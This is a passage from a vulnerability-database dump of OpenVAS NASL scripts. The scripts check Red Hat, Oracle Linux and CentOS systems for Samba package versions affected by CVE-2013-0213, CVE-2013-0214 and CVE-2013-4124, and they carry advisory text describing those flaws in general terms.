exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Oracle Linux Local Security Checks ELSA-2014-0305", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123447", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0305", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0305.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123447\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:56 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0305\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0305 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0305\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0305.html\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.40.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-27T10:51:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Check for the Version of samba", "modified": "2017-07-12T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:871072", "href": "http://plugins.openvas.org/nasl.php?oid=871072", "type": "openvas", "title": "RedHat Update for samba RHSA-2013:1542-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2013:1542-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871072);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:43:40 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba RHSA-2013:1542-02\");\n\n tag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the\nSamba server.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll samba users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\n\";\n\n tag_affected = \"samba on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1542-02\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00019.html\");\n script_summary(\"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:1361412562310871072", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871072", "type": "openvas", "title": "RedHat Update for samba RHSA-2013:1542-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2013:1542-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871072\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:43:40 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba RHSA-2013:1542-02\");\n\n\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the\nSamba server.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll samba users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1542-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00019.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.9~164.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-27T10:51:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Check for the Version of samba3x", "modified": "2017-07-12T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:871042", "href": "http://plugins.openvas.org/nasl.php?oid=871042", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2013:1310-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2013:1310-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871042);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:16:53 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for samba3x RHSA-2013:1310-01\");\n\n tag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked to in\nthe References, for information on the most significant of these changes.\n\nAll samba3x users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n\";\n\n tag_affected = \"samba3x on Red Hat Enterprise Linux (v. 5 server)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1310-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00051.html\");\n script_summary(\"Check for the Version of samba3x\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.6~0.136.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Oracle Linux Local Security Checks ELSA-2013-1310", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123558", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123558", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1310", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1310.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123558\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:30 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1310\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1310 - samba3x security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1310\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1310.html\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.6~0.136.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-03-20T00:00:00", "id": "OPENVAS:1361412562310881903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881903", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2014:0305 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2014:0305 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public 